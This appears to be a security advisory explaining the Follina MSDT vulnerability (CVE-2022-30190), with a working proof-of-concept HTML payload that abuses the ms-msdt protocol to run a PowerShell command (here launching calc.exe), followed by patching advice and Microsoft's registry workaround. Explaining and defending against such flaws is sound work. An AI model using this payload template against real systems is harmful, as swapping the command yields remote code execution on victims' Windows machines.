Follina (CVE-2022-30190)

Follina is a newly discovered vulnerability that allows to exploit the Microsoft Support Diagnostic Tool (MSDT) via specifically crafted Microsoft Office and Rich Text Format files. It is a RCE vulnerability and therefore enables an attacker to execute code on the exploited Windows system.


UPDATE: Microsoft released a security patch and update guide in the meantime.


For exploitation the victim needs to either open an Office document (e.g. .docx file) or preview a Rich Text Format (.rtf file) in the Windows Explorer. Macros aren’t needed for the exploitation.

It can be replicated by creating an Office document that contains a malicious object inside it. When opening such a malicious document in Microsoft Word, external HTML content is loaded from the attackers server. This external HTML contains the payload which uses a flaw inside MSDT to execute code (snippet taken from here):

<!doctype html>
<html lang="en">
  <body>
    <script>
      // AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
      // ... repeat the A's for 60 lines
      // AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
    </script>
  </body>
</html>

In the HTML snipped above, the window.location.href contains the payload, which is executed when the ms-msdt URL protocol is handled. In this example the Windows calculator (calc.exe) is started.

A detailed guide on how to craft such a malicious document manually can be found here.

Mitigation

The latest version of Microsoft Defender blocks both exploitation vectors. This is done by disallowing Microsoft Word to open links with the ms-msdt protocol and preventing other suspicous behaviour. Our testing revealed that the newest version of Word (Build 2205) prevents this specific attack. Therefore, as always: Update and stay current.

Microsoft also published a recommendation for the vulnerability: Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability.

The current workaround is to disable the MSDT URL protocol by deleting the corresponding registry key. The following commands (provided by Microsoft) do exactly that and need to be executed in a Command Prompt as Administrator:

# backup the registry key to a file. 'filename' needs to be changed.
reg export HKEY_CLASSES_ROOT\ms-msdt filename

# delete the ms-msdt entry, which disables the MSDT URL protocol
reg delete HKEY_CLASSES_ROOT\ms-msdt /f

To undo the workaround, the registry key must be restored via the backup file filename:

# import the backup file 'filename' from above into the registry
# to restore the MSDT entry. 'filename' needs to be changed.  
reg import filename